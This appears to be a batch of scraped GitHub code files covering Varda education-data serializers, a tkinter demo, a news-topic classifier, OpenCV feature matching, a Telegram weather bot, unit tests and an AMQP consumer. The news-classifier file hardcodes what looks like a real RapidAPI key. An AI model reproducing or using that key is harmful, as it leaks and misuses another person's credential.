Tutkinto\n list_serializer_class = TkBaseListSerializer\n fields = ('id', 'action', 'tutkinto_koodi',)\n\n\nclass TkTaydennyskoulutusSerializer(HistoricalBaseSerializer, serializers.ModelSerializer):\n tehtavanimikkeet = serializers.SerializerMethodField()\n\n class Meta:\n model = Taydennyskoulutus\n list_serializer_class = TkBaseListSerializer\n fields = ('id', 'action', 'nimi', 'suoritus_pvm', 'koulutuspaivia', 'tehtavanimikkeet',)\n\n @swagger_serializer_method(serializer_or_field=serializers.ListField(child=serializers.CharField()))\n def get_tehtavanimikkeet(self, instance):\n # Get list of tehtavanimikkeet that are active during the time window\n # QuerySet may contain duplicates and distinct + annotate is not supported so use set\n return set(TaydennyskoulutusTyontekija.history.values('id')\n .filter(taydennyskoulutus_id=instance.id, tyontekija_id=self.context['tyontekija_id'],\n history_date__lte=self.datetime_lte)\n .annotate(history_type_list=StringAgg('history_type', ','))\n .filter(~(Q(history_type_list__contains='+') & Q(history_type_list__contains='-')))\n .order_by('id').values_list('tehtavanimike_koodi', flat=True))\n\n\nclass TkHenkilostotiedotSerializer(HistoricalBaseSerializer, serializers.ModelSerializer):\n etunimet = serializers.CharField(source='henkilo_instance.etunimet', allow_null=True)\n sukunimi = serializers.CharField(source='henkilo_instance.sukunimi', allow_null=True)\n henkilo_oid = serializers.CharField(source='henkilo_instance.henkilo_oid', allow_null=True)\n henkilotunnus = serializers.SerializerMethodField()\n syntyma_pvm = serializers.DateField(source='henkilo_instance.syntyma_pvm', allow_null=True)\n aidinkieli_koodi = serializers.CharField(source='henkilo_instance.aidinkieli_koodi', allow_null=True)\n sukupuoli_koodi = serializers.CharField(source='henkilo_instance.sukupuoli_koodi', allow_null=True)\n tutkinnot = serializers.SerializerMethodField()\n palvelussuhteet = serializers.SerializerMethodField()\n taydennyskoulutukset = serializers.SerializerMethodField()\n\n class Meta:\n model = Tyontekija\n list_serializer_class = TkBaseListSerializer\n fields = ('id', 'action', 'etunimet', 'sukunimi', 'henkilo_oid', 'henkilotunnus', 'syntyma_pvm',\n 'aidinkieli_koodi', 'sukupuoli_koodi', 'vakajarjestaja_id', 'tutkinnot', 'palvelussuhteet',\n 'taydennyskoulutukset',)\n\n def to_representation(self, instance):\n # Get henkilo data from history table or actual table (history is incomplete in test environments)\n henkilo = (Henkilo.history.filter(id=instance.henkilo_id, history_date__lte=self.datetime_lte)\n .distinct('id').order_by('id', '-history_date').first())\n if not henkilo:\n henkilo = Henkilo.objects.filter(id=instance.henkilo_id).first()\n instance.henkilo_instance = henkilo\n self.secondary_muutos_pvm = getattr(henkilo, 'muutos_pvm', None)\n self.context['tyontekija_id'] = instance.id\n\n return super().to_representation(instance)\n\n def get_henkilotunnus(self, instance):\n henkilotunnus = getattr(instance.henkilo_instance, 'henkilotunnus', None)\n henkilo_id = getattr(instance.henkilo_instance, 'id', None)\n return decrypt_henkilotunnus(henkilotunnus, henkilo_id=henkilo_id, raise_error=False)\n\n @swagger_serializer_method(serializer_or_field=TkTutkintoSerializer)\n def get_tutkinnot(self, instance):\n last_parent_subquery = get_history_value_subquery(Tutkinto, 'vakajarjestaja_id', self.datetime_lte)\n previous_parent_subquery = get_history_value_subquery(Tutkinto, 'vakajarjestaja_id', self.datetime_gt)\n tutkinto_qs = (Tutkinto.history\n .filter(henkilo_id=instance.henkilo_id, vakajarjestaja_id=instance.vakajarjestaja_id,\n history_date__gt=self.datetime_gt, history_date__lte=self.datetime_lte)\n .annotate(last_parent_id=last_parent_subquery, previous_parent_id=previous_parent_subquery)\n .filter(last_parent_id=instance.vakajarjestaja_id)\n .distinct('id').order_by('id', '-history_date'))\n return TkTutkintoSerializer(tutkinto_qs, many=True, context=self.context).data\n\n @swagger_serializer_method(serializer_or_field=TkPalvelussuhdeSerializer)\n def get_palvelussuhteet(self, instance):\n id_qs = get_related_object_changed_id_qs(Palvelussuhde.get_name(), self.datetime_gt,\n self.datetime_lte, additional_filters=Q(parent_instance_id=instance.id))\n\n last_parent_subquery = get_history_value_subquery(Palvelussuhde, 'tyontekija_id', self.datetime_lte)\n previous_parent_subquery = get_history_value_subquery(Palvelussuhde, 'tyontekija_id', self.datetime_gt)\n palvelussuhde_qs = (Palvelussuhde.history\n .filter(id__in=Subquery(id_qs), tyontekija_id=instance.id,\n history_date__lte=self.datetime_lte)\n .annotate(last_parent_id=last_parent_subquery, previous_parent_id=previous_parent_subquery)\n .filter(last_parent_id=instance.id)\n .distinct('id').order_by('id', '-history_date'))\n return TkPalvelussuhdeSerializer(palvelussuhde_qs, many=True, context=self.context).data\n\n @swagger_serializer_method(serializer_or_field=TkTaydennyskoulutusSerializer)\n def get_taydennyskoulutukset(self, instance):\n id_qs = get_related_object_changed_id_qs(\n Tyontekija.get_name(), self.datetime_gt, self.datetime_lte, return_value='parent_instance_id',\n additional_filters=Q(instance_id=instance.id) & Q(trigger_model_name=TaydennyskoulutusTyontekija.get_name())\n )\n taydennyskoulutus_qs = (Taydennyskoulutus.history\n .filter(id__in=Subquery(id_qs), history_date__lte=self.datetime_lte)\n .distinct('id').order_by('id', '-history_date'))\n return TkTaydennyskoulutusSerializer(taydennyskoulutus_qs, many=True, context=self.context).data\n\n\nclass ValssiOrganisaatioSerializer(HistoricalBaseSerializer, serializers.ModelSerializer):\n parent_oid = serializers.CharField(default=settings.OPETUSHALLITUS_ORGANISAATIO_OID)\n\n class Meta:\n model = Organisaatio\n fields = ('id', 'action', 'nimi', 'y_tunnus', 'organisaatio_oid', 'parent_oid', 'organisaatiotyyppi',\n 'kunta_koodi', 'sahkopostiosoite', 'kayntiosoite', 'kayntiosoite_postinumero',\n 'kayntiosoite_postitoimipaikka', 'postiosoite', 'postinumero', 'postitoimipaikka', 'puhelinnumero',\n 'alkamis_pvm', 'paattymis_pvm',)\n\n\nclass ValssiToimipaikkaSerializer(HistoricalBaseSerializer, serializers.ModelSerializer):\n parent_oid = serializers.SerializerMethodField()\n organisaatiotyyppi = serializers.ListField(child=serializers.CharField(),\n default=[Organisaatiotyyppi.TOIMIPAIKKA.value])\n\n class Meta:\n model = Toimipaikka\n fields = ('id', 'action', 'nimi', 'organisaatio_oid', 'parent_oid', 'organisaatiotyyppi', 'postinumero',\n 'jarjestamismuoto_koodi', 'toimintamuoto_koodi')\n\n @swagger_serializer_method(serializer_or_field=serializers.CharField)\n def get_parent_oid(self, instance):\n organisaatio = (Organisaatio.history\n .filter(id=instance.vakajarjestaja_id, history_date__lte=self.datetime_lte)\n .distinct('id').order_by('id', '-history_date').first())\n return getattr(organisaatio, 'organisaatio_oid', None)\n\n\nclass ValssiTyoskentelypaikkaSerializer(serializers.ModelSerializer):\n class Meta:\n model = Tyoskentelypaikka\n fields = ('tehtavanimike_koodi', 'kelpoisuus_kytkin',)\n\n\nclass ValssiTyontekijaSerializer(serializers.ModelSerializer):\n kutsumanimi = serializers.CharField(source='henkilo.kutsumanimi')\n sukunimi = serializers.CharField(source='henkilo.sukunimi')\n tutkinnot = serializers.SerializerMethodField()\n tehtavanimikkeet = serializers.SerializerMethodField()\n\n class Meta:\n model = Tyontekija\n fields = ('id', 'kutsumanimi', 'sukunimi', 'sahkopostiosoite', 'tutkinnot', 'tehtavanimikkeet',)\n\n @swagger_serializer_method(serializer_or_field=serializers.ListField(child=serializers.CharField()))\n def get_tutkinnot(self, instance):\n return (Tutkinto.objects\n .filter(henkilo=instance.henkilo, vakajarjestaja=instance.vakajarjestaja)\n .distinct('id').values_list('tutkinto_koodi', flat=True))\n\n @swagger_serializer_method(serializer_or_field=ValssiTyoskentelypaikkaSerializer(many=True))\n def get_tehtavanimikkeet(self, instance):\n today = datetime.date.today()\n tyoskentelypaikka_qs = (Tyoskentelypaikka.objects\n .filter(get_active_filter(today), palvelussuhde__tyontekija=instance,\n toimipaikka=self.context['view'].toimipaikka)\n .distinct('tehtavanimike_koodi')\n .order_by('tehtavanimike_koodi', '-kelpoisuus_kytkin'))\n return ValssiTyoskentelypaikkaSerializer(tyoskentelypaikka_qs, many=True, context=self.context).data\n\n\nclass ValssiTaustatiedotToimipaikatSerializer(serializers.Serializer):\n total = serializers.IntegerField()\n toimintamuodot = CustomSchemaField({\n 'type': openapi.TYPE_OBJECT,\n 'additionalProperties': {\n 'type': openapi.TYPE_OBJECT,\n 'properties': {\n 'total': {\n 'type': openapi.TYPE_INTEGER\n }\n },\n 'additionalProperties': {\n 'type': openapi.TYPE_INTEGER\n }\n }\n })\n\n\nclass ValssiTaustatiedotTyontekijatSerializer(serializers.Serializer):\n total = serializers.IntegerField()\n tehtavanimikkeet = CustomSchemaField({\n 'type': openapi.TYPE_OBJECT,\n 'additionalProperties': {\n 'type': openapi.TYPE_INTEGER\n }\n })\n tehtavanimikkeet_kelpoiset = CustomSchemaField({\n 'type': openapi.TYPE_OBJECT,\n 'additionalProperties': {\n 'type': openapi.TYPE_INTEGER\n }\n })\n\n\nclass ValssiTaustatiedotTaydennyskoulutuksetSerializer(serializers.Serializer):\n tehtavanimikkeet = CustomSchemaField({\n 'type': openapi.TYPE_OBJECT,\n 'additionalProperties': {\n 'type': openapi.TYPE_INTEGER\n }\n })\n koulutuspaivat = DecimalField(0, 0)\n tehtavanimikkeet_koulutuspaivat = CustomSchemaField({\n 'type': openapi.TYPE_OBJECT,\n 'additionalProperties': {\n 'type': openapi.TYPE_STRING,\n 'format': openapi.FORMAT_DECIMAL\n }\n })\n\n\nclass ValssiTaustatiedotSerializer(serializers.Serializer):\n id = serializers.IntegerField()\n organisaatio_oid = serializers.CharField()\n toimipaikat = ValssiTaustatiedotToimipaikatSerializer()\n lapset_voimassa = serializers.IntegerField()\n tyontekijat = ValssiTaustatiedotTyontekijatSerializer()\n taydennyskoulutukset = ValssiTaustatiedotTaydennyskoulutuksetSerializer()\n","repo_name":"Opetushallitus/varda","sub_path":"webapps/varda/serializers_reporting.py","file_name":"serializers_reporting.py","file_ext":"py","file_size_in_byte":57875,"program_lang":"python","lang":"fi","doc_type":"code","stars":3,"dataset":"github-code","pt":"52"} +{"seq_id":"71996235046","text":"from tkinter import *\n\nmaster = Tk()\n\ndef test1():\n\tif e1.get() ==\"浩文哥\":\n\t\tprint(\"非常棒!正确!\")\n\t\treturn True\n\telse:\n\t\tprint(\"错误!\")\n\t\te1.delete(0,END)\n\t\treturn False\ndef test2():\n\tprint(\"嘤嘤嘤!!!\")\n\treturn False\nv = StringVar()\n\ne1 = Entry(master,textvariable = v,validate = \"focusout\",validatecommand = test1,invalidcommand=test2)\ne2 = Entry(master)\ne1.pack(padx = 10, pady = 10)\ne2.pack(padx = 10, pady = 10)\n\nmainloop()\nimport PyQt5","repo_name":"Haowen-Zhong/Python-Learning","sub_path":"May/Tkinter/14.py","file_name":"14.py","file_ext":"py","file_size_in_byte":467,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"32963637797","text":"import http.client\nimport json\nimport os\nimport pickle\nimport random\nimport re\nimport string\nfrom termcolor import colored\nfrom collections import defaultdict\n\nfrom nltk import FreqDist, word_tokenize\nfrom nltk.corpus import stopwords\nfrom sklearn import metrics\nfrom sklearn.feature_extraction.text import CountVectorizer\nfrom sklearn.naive_bayes import MultinomialNB\n\nstop_words = set(stopwords.words('english'))\n# stop_words.add('war')\n\nLABELS = ['business', 'entertainment', 'politics', 'sport', 'tech']\nBASE_DIR = os.getcwd()\n\n\ndef create_data_set():\n with open('data.txt', 'w', encoding='utf-8') as outfile:\n for label in LABELS:\n directory = '%s/NewsArticles/%s' % (BASE_DIR, label)\n for filename in os.listdir(directory):\n full_filename = '%s/%s' % (directory, filename)\n with open(full_filename, 'rb') as file:\n text = file.read().decode(errors='replace').replace('\\n', '')\n outfile.write('%s\\t%s\\t%s\\n' % (label, filename, text))\n\n\ndef setup_docs():\n documents = []\n with open('data.txt', 'r', encoding='utf-8') as datafile:\n for row in datafile:\n parts = row.split('\\t')\n doc = (parts[0], parts[2].strip())\n documents.append(doc)\n return documents\n\n\ndef print_frequency_dist(documents):\n tokens = defaultdict(list)\n for doc in documents:\n doc_label = doc[0]\n doc_text = clean_text(doc[1])\n doc_tokens = get_tokens(doc_text)\n tokens[doc_label].extend(doc_tokens)\n\n for category_label, category_tokens in tokens.items():\n fd = FreqDist(category_tokens)\n print(category_label, fd.most_common(20))\n\n\ndef clean_text(text):\n text = text.translate(str.maketrans('', '', string.punctuation))\n text = text.lower()\n return text\n\n\ndef get_tokens(text):\n tokens = word_tokenize(text)\n tokens = [t for t in tokens if not t in stop_words]\n return tokens\n\n\ndef lemmatizer(txt):\n txt = re.sub(r\"\\W\", ' ', txt)\n txt = re.sub(r'\\s+[a-zA-Z]\\s+', ' ', txt)\n txt = re.sub(r'\\^[a-zA-Z]\\s+', ' ', txt)\n txt = re.sub(r'\\s+', ' ', txt, flags=re.I)\n txt = txt.lower()\n return txt\n\n\ndef get_splits(docs):\n random.shuffle(docs)\n X_train = []\n y_train = []\n X_test = []\n y_test = []\n\n pivot = int(.80 * len(docs))\n\n for i in range(0, pivot):\n X_train.append(docs[i][1])\n y_train.append(docs[i][0])\n\n for i in range(pivot, len(docs)):\n X_test.append(docs[i][1])\n y_test.append(docs[i][0])\n\n return X_train, X_test, y_train, y_test\n\n\ndef evaluate_classifier(title, classifier, vectorizer, X_test, y_test):\n X_test_tfidf = vectorizer.transform(X_test)\n y_pred = classifier.predict(X_test_tfidf)\n\n precision = metrics.precision_score(y_test, y_pred, average='micro')\n recall = metrics.recall_score(y_test, y_pred, average='micro')\n f1 = metrics.f1_score(y_test, y_pred, average='micro')\n\n print(\"%s\\t%f\\t%f\\t%f\\n\" % (title, precision, recall, f1))\n\n\ndef train_classifier(docs):\n X_train, X_test, y_train, y_test = get_splits(docs)\n vectorizer = CountVectorizer(stop_words='english', ngram_range=(1, 3), min_df=3, analyzer='word')\n dtm = vectorizer.fit_transform(X_train)\n naive_bayes_classifier = MultinomialNB().fit(dtm, y_train)\n evaluate_classifier('Naive Bayes\\tTRAIN\\t', naive_bayes_classifier, vectorizer, X_train, y_train)\n evaluate_classifier('Naive Bayes\\tTEST\\t', naive_bayes_classifier, vectorizer, X_test, y_test)\n\n clf_filename = 'naive_bayes_classifier.pkl'\n pickle.dump(naive_bayes_classifier, open(clf_filename, 'wb'))\n\n vec_filename = 'count_vectorizer.pkl'\n pickle.dump(vectorizer, open(vec_filename, 'wb'))\n\n\ndef classify(title, text):\n clf_filename = 'naive_bayes_classifier.pkl'\n nb_clf = pickle.load(open(clf_filename, 'rb'))\n\n vec_filename = 'count_vectorizer.pkl'\n vectorizer = pickle.load(open(vec_filename, 'rb'))\n\n pred = nb_clf.predict(vectorizer.transform([text]))\n print(colored('Краткая аннотация текста: '.ljust(35), 'red') + colored(title, 'blue', attrs=['blink']))\n print(colored('Предположительная тема текста: '.ljust(35), 'yellow') + colored(pred[0].upper(), 'magenta',\n attrs=['bold', 'underline']))\n save_files(title, pred[0])\n print(colored('\\n ******* \\n', 'green'))\n # d = {title: pred[0]}\n # print(json.dumps(d))\n\n\ndef save_files(title, topic):\n title = title.split(':')[0] if len(title.split(':')) > 1 else title\n if not os.path.exists('Saved/' + topic):\n os.makedirs('Saved/' + topic)\n if not os.path.isfile('Saved/' + topic + '/' + title + \".txt\"):\n with open('Saved/' + topic + '/' + title + \".txt\", \"w\") as file:\n file.write(title)\n\ndef fetch_articles():\n conn = http.client.HTTPSConnection(\"newscatcher.p.rapidapi.com\")\n\n headers = {\n 'x-rapidapi-host': \"newscatcher.p.rapidapi.com\",\n 'x-rapidapi-key': \"1003d62a71msh23a608e75d952c1p19542fjsn3d3e40adc5d0\"\n }\n\n conn.request(\"GET\", \"/v1/latest_headlines?lang=en&media=True\", headers=headers)\n\n res = conn.getresponse()\n data = res.read()\n\n news = json.loads(data)['articles']\n for piece in news:\n classify(piece['title'], piece['summary'])\n\n\nif __name__ == '__main__':\n fetch_articles()\n # all_docs = setup_docs()\n # print_frequency_dist(all_docs)\n\n # train_classifier(all_docs)\n # create_data_set()\n # print(all_docs[0][1])\n # print(lemmatizer(all_docs[0][1]))\n","repo_name":"eugenart/Acad","sub_path":"Python/ArticlesFetch/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5641,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"72623407205","text":"class Solution:\n def isCompleteTree(self, root: TreeNode) -> bool:\n \n queue = collections.deque([(root, 1)]) \n \n tree = collections.defaultdict(list)\n \n while queue:\n node, depth = queue.popleft() \n tree[depth] += [node.val if node else None]\n if not node: continue \n queue.extend([(node.left, depth+1), (node.right, depth+1)]) \n \n keys = list(sorted(tree.keys()))\n \n a, b = all([all(tree[i]) for i in keys[:-2]]), True\n if len(keys) >= 2:\n x = tree[keys[-2]] \n found = False\n for i in x:\n if not i: \n found = True\n elif found:\n return False\n \n return a and b\n \n \n\"\"\"\nBFS\ncheck if None in level before adding\n if so, return False\n\"\"\"\n ","repo_name":"josharnoldjosh/LeetCodeSolutions","sub_path":"check-completeness-of-a-binary-tree/check-completeness-of-a-binary-tree.py","file_name":"check-completeness-of-a-binary-tree.py","file_ext":"py","file_size_in_byte":1000,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"11154729285","text":"import sys\nimport numpy as np\nimport cv2\n\n\n# 영상 불러오기\nsrc1 = cv2.imread('./images/graf1.png', cv2.IMREAD_GRAYSCALE)\nsrc2 = cv2.imread('./images/graf3.png', cv2.IMREAD_GRAYSCALE)\n\nif src1 is None or src2 is None:\n print('Image load failed!')\n sys.exit()\n\n# 특징점 알고리즘 객체 생성 (KAZE, AKAZE, ORB 등)\n# feature = cv2.KAZE_create()\n# feature = cv2.AKAZE_create()\nfeature = cv2.ORB_create()\n\n# 특징점 검출 및 기술자 계산\nkp1, desc1 = feature.detectAndCompute(src1, None)\nkp2, desc2 = feature.detectAndCompute(src2, None)\n\n# 특징점 매칭\n# SIFT, SURF, KAZE 등의 실수 기술자는 L2 놈(L2 norm)방법을 써야됨\n# matcher = cv2.BFMatcher_create()\n# AKAZE, ORB, BRIEF 등의 이진 기술자는 아래의 NORM_HAMMING(해밍 거리) 방법을 써야됨\nmatcher = cv2.BFMatcher_create(cv2.NORM_HAMMING)\n\n# 디스크립트(매칭정보)를 이용하여 매칭을 함\nmatches = matcher.match(desc1, desc2)\ngood_matches = matches[:100]\n\nprint('# of kp1:', len(kp1))\nprint('# of kp2:', len(kp2))\nprint('# of matches:', len(matches))\n\n# 특징점 매칭 결과 영상 생성\ndst = cv2.drawMatches(src1, kp1, src2, kp2, good_matches, None)\n\ncv2.imshow('dst', dst)\ncv2.waitKey()\ncv2.destroyAllWindows()","repo_name":"tmd9936/ys_study","sub_path":"comVision/특징점매칭.py","file_name":"특징점매칭.py","file_ext":"py","file_size_in_byte":1244,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"37620689717","text":"import telebot\nimport requests\nimport secrets\n\nAPI_KEY = secrets.API_KEY\nAPI_TOKEN = secrets.API_TOKEN\n\nbot = telebot.TeleBot(API_TOKEN)\n\n\n# Handle '/start' and '/help'\n@bot.message_handler(commands=['help', 'start'])\ndef send_welcome(message):\n bot.reply_to(message, \"\"\"\n Hello I am a weather information bot\n command: /weather <cityname>\n\"\"\")\n\n@bot.message_handler(commands=['weathern'])\ndef send_welcome(message):\n bot.reply_to(message, \"featching weather...\")\n # print(message)\n # m = dict(message)\n city = message.json[\"text\"].split()[-1]\n # city = m[\"json\"][\"text\"].split()[-1]\n # print(city)\n # print(\"https://api.weatherapi.com/v1/current.json?key=\"+API_KEY+\"&q=\"+city+\"&aqi=no\")\n a = requests.get(\"https://api.weatherapi.com/v1/current.json?key=\"+API_KEY+\"&q=\"+city+\"&aqi=no\")\n a = eval(a.text)\n # print(a)\n msg = a[\"location\"][\"name\"]+\"\\nwind (km/h) \"+str(a[\"current\"][\"wind_kph\"])+a[\"current\"][\"wind_dir\"]+\"\\n\\\nhumidity \"+str(a[\"current\"][\"humidity\"])+\"\\nfeels like\"+str(a[\"current\"][\"feelslike_c\"])+\"°C\"\n\n\n bot.reply_to(message, msg)\n\n@bot.message_handler(commands=['.'])\ndef send_welcome(message):\n bot.reply_to(message, \"/start, /help, /game\")\n\n\n\n# Handle all other messages with content_type 'text' (content_types defaults to ['text'])\n@bot.message_handler(func=lambda message: True)\ndef echo_message(message):\n # print(message)\n bot.reply_to(message, message.text)\n\n\nbot.infinity_polling()\n","repo_name":"anuragdaksh7/telebot","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1469,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"39255316550","text":"import unittest\nfrom fitterlog.interface import Sentence , Clause\nimport random\nfrom YTools.universe.exceptions import ArgumentError\n\nclass TestInterface(unittest.TestCase):\n\n\tdef setUp(self):\n\t\tself.s = Sentence(predicate_struct = Clause( sons = [\n\t\t\tClause(\"loss\" , haha = 2333 , default = 0 , sons = [\n\t\t\t\tClause(\"test\" , display = True , default = 0) ,\n\t\t\t\tClause(\"dev\" , display = True , default = 1) , \n\t\t\t]) , \n\t\t\tClause(\"hyper parameter\" , display = False , sons = [\n\t\t\t\tClause(\"n\" , default = 12) , \n\t\t\t\tClause(\"m\") , \n\t\t\t]),\n\t\t\tClause(\"acc\" , display = False , sons = [\n\t\t\t\tClause(\"dev\" , display = True , default = 3) , \n\t\t\t]),\n\t\t\tClause(\"note\" , default = \"\")\n\t\t]))\n\n\t\tself.sb = Sentence(predicate_struct = Clause( sons = [\n\t\t\tClause(\"loss\" , haha = 2333 , default = 0 , sons = [\n\t\t\t\tClause(\"test\" , display = True , default = 0) ,\n\t\t\t\tClause(\"dev\" , display = True , default = 4) , \n\t\t\t]) , \n\t\t\tClause(\"hyper parameter\" , display = False , sons = [\n\t\t\t\tClause(\"n\" , default = 12) , \n\t\t\t]),\n\t\t\tClause(\"note\" , default = \"\")\n\t\t]))\n\n\tdef tearDown(self):\n\t\tself.s = None\n\t\tself.sb = None\n\n\tdef test_sentence(self):\n\n\t\ts = self.s\n\t\tsb = self.sb\n\n\t\tself.assertEqual(s[\"loss\"].attrs[\"haha\"] , 2333)\n\t\tself.assertEqual(s[\"test\"].attrs[\"display\"] , True)\n\t\tself.assertEqual(s[\"n\"].attrs[\"default\"] , 12)\n\t\twith self.assertRaises(ArgumentError):\n\t\t\t\tprint (s[\"dev\"])\n\t\tself.assertEqual(sb[\"dev\"].attrs[\"default\"] , 4)\n\n\n\t\ts[\"test\"].update(3)\n\t\t\n\t\tself.assertEqual(s[\"test\"].value , 3)\t\t\n\t\tself.assertEqual(s[\"loss\"][\"dev\"].value , 1)\n\t\tself.assertEqual(s[\"acc\"][\"dev\"].value , 3)\n\t\tself.assertIs(s[\"loss\"][\"dev\"]._value.value , None)\n\t\tself.assertEqual(s[\"note\"].value , \"\")\n\t\tself.assertIs(s[\"m\"].value , None)\n\n\t\twith self.assertRaises(ArgumentError):\n\t\t\ts[\"num_layers\"]\n\t\twith self.assertRaises(ArgumentError):\n\t\t\ts[\"num_heads\"]\n\t\twith self.assertRaises(ArgumentError):\n\t\t\ts[\"d\"]\n\t\twith self.assertRaises(ArgumentError):\n\t\t\ts[\"is_torch\"]\n\n\t\tcmd_hyper = {\n\t\t\t\"num_layers\" : 3 ,\n\t\t\t\"num_heads\" : 16 ,\n\t\t\t\"d\" : 128 , \n\t\t\t\"is_torch\": False , \n\t\t}\n\n\t\ts.new_clauses_from_dict(cmd_hyper)\n\n\t\tself.assertEqual(s[\"num_layers\"].value \t, 3 \t)\n\t\tself.assertEqual(s[\"num_heads\"].value \t, 16 \t)\n\t\tself.assertEqual(s[\"d\"].value \t\t\t, 128 \t)\n\t\tself.assertEqual(s[\"is_torch\"].value \t, False\t)\n\n\t\twith self.assertRaises(ArgumentError):\n\t\t\ts[\"Acc\"]\n\n\t\tself.assertEqual(s[\"test\"].value , 3)\t\t\n\n\t\ts.new_clause(\"Acc\")\n\t\ts[\"Acc\"].new_clause(\"train\" , default = 0)\n\t\ts[\"Acc\"].new_clause(\"test\" )\n\n\t\tself.assertIs(s[\"Acc\"][\"test\"].value , None)\n\t\tself.assertEqual(s[\"Acc\"][\"train\"].value , 0)\n\t\twith self.assertRaises(ArgumentError):\n\t\t\t\tprint (s[\"test\"])\n\n\tdef test_syntax(self):\n\n\t\ts = self.s\n\t\tsb = self.sb\n\n\t\tcc = \"-fitterlog-concat-\"\n\n\t\tself.assertEqual(s[\"loss\"]._pred.name, \"{0}_fitterlog_root{0}loss\".format(cc))\n\t\tself.assertEqual(s[\"test\"]._pred.name, \"{0}_fitterlog_root{0}loss{0}test\".format(cc))\n\t\tself.assertEqual(s[\"test\"]._clause.name, \"test\")\n\t\tself.assertEqual(s[\"test\"]._clause.real_name, \"{0}_fitterlog_root{0}loss{0}test\".format(cc))\n\n\t\tself.assertEqual(s[\"n\"]._pred.id , sb[\"n\"]._pred.id)\n\n\n\tdef test_save_and_load(self):\n\t\ts = Sentence(predicate_struct = Clause( sons = [\n\t\t\tClause(\"loss\" , haha = 2333 , default = 0 , sons = [\n\t\t\t\tClause(\"test\" , display = True , default = 0 , fucke = \"me\") ,\n\t\t\t\tClause(\"dev\" , display = True , default = 1) , \n\t\t\t]) , \n\t\t\tClause(\"hyper parameter\" , display = False , sons = [\n\t\t\t\tClause(\"n\" , default = 12) , \n\t\t\t\tClause(\"m\") , \n\t\t\t]),\n\t\t\tClause(\"acc\" , display = False , sons = [\n\t\t\t\tClause(\"dev\" , display = True , default = 1) , \n\t\t\t]),\n\t\t\tClause(\"note\" , default = \"\")\n\t\t]))\n\n\t\ts[\"test\"].update(3)\n\t\ts[\"test\"].update(2)\n\t\ts[\"test\"].update(1)\n\t\ts[\"m\"].update(2333)\n\n\t\ts.save()\n\n\t\tthe_noun = s.noun\n\n\t\tsb = Sentence(noun = the_noun)\n\t\tself.assertEqual(sb[\"test\"].value , s[\"test\"].value)\n\t\tself.assertEqual(sb[\"test\"].value , 1)\n\t\tself.assertEqual(sb[\"test\"].attrs[\"display\"] , True)\n\t\tself.assertEqual(sb[\"test\"].attrs[\"fucke\"] , \"me\")\n\t\tself.assertEqual(sb[\"loss\"].attrs[\"haha\"] , s[\"loss\"].attrs[\"haha\"])\n\t\tself.assertEqual(sb[\"loss\"].attrs[\"haha\"] , 2333)\n\n\nif __name__ == \"__main__\":\n\tunittest.main()\n\t","repo_name":"FFTYYY/FitterLog","sub_path":"test/units/test_interface.py","file_name":"test_interface.py","file_ext":"py","file_size_in_byte":4157,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"52"} +{"seq_id":"12568281154","text":"import pika\nimport os\nimport psycopg2\nfrom datetime import datetime\nimport json\n\n\nenv_file_path = '../.env'\nimage_dir_path = ''\ndb_params = {\n 'dbname': 'event_db',\n 'user': 'server',\n 'password': 'server',\n 'host': 'localhost',\n 'port': '5432'\n}\nevent_table = 'event_table'\n\n\n# Get the timestamp of the event\ndef getTimestampFromEvent(event):\n data = json.loads(event)\n timestamp_str = data.get('@timestamp')\n if timestamp_str:\n timestamp = datetime.strptime(timestamp_str, \"%Y-%m-%dT%H:%M:%S.%fZ\")\n return timestamp\n else:\n return None\n\n\n# Get image path go with this event\ndef getImagePathFromEvent(event):\n image_path = ''\n return image_path\n\n\n# Insert event to database\ndef insert_db(event):\n timestamp = getTimestampFromEvent(event)\n image_path = getImagePathFromEvent(event)\n\n # Data to insert to database\n data_to_insert = (timestamp, event, image_path)\n try:\n # Connect to the PostgreSQL database\n connection = psycopg2.connect(**db_params)\n\n # Create a cursor object\n cursor = connection.cursor()\n\n # SQL statement to insert data into the table\n insert_query = \"INSERT INTO \" + event_table + \\\n \" (timestamp, event, image_path) VALUES (%s, %s, %s)\"\n\n cursor.execute(insert_query, data_to_insert)\n\n except (Exception, psycopg2.Error) as error:\n print(f\"Error inserting data: {error}\")\n\n\n# Read and parse the .env file\nwith open(env_file_path) as f:\n for line in f:\n if line.strip() and not line.strip().startswith(\"#\"):\n key, value = line.strip().split(\"=\", 1)\n os.environ[key] = value\n\n# Read the AMQP server configuration from the environment variables\namqp_url = os.environ.get('AMQP_URL')\nqueue_name = os.environ.get('QUEUE')\n\n# Create a connection to the AMQP server using the configuration\nconnection_parameters = pika.URLParameters(amqp_url)\nconnection = pika.BlockingConnection(connection_parameters)\nchannel = connection.channel()\n\n# Declare the queue\nchannel.queue_declare(queue=queue_name)\n\n\n# Define a callback function to process incoming messages\ndef callback(ch, method, properties, body):\n # Decode the message from bytes to string\n decoded_message = body.decode('utf-8')\n print(f\"{decoded_message}\")\n\n decoded_message = decoded_message.replace(\"\\n\", \"\")\n # insert_db(decoded_message)\n\n ch.basic_ack(delivery_tag=method.delivery_tag)\n\n\n# Set up the consumer and specify the callback function\nchannel.basic_consume(\n queue=queue_name, on_message_callback=callback)\n\n# Start consuming messages\nprint('Waiting for messages. To exit, press CTRL+C')\ntry:\n channel.start_consuming()\nexcept KeyboardInterrupt:\n channel.stop_consuming()\n","repo_name":"acsii-63/cloud-based","sub_path":"sample/receive_cloud.py","file_name":"receive_cloud.py","file_ext":"py","file_size_in_byte":2752,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"33641300087","text":"import unittest\nimport numpy as np\nimport spin_dynamics\n\n#-----------------------------------------------------------------------------#\n#-----------------------------------------------------------------------------#\n\n#Radical parameters\nnA = 5\nmA = np.array([2,2,2,2,2])\nA_tensorA = np.zeros([5,3,3], dtype=float)\nA_tensorA[0] = np.array([[-0.0636, 0.0, 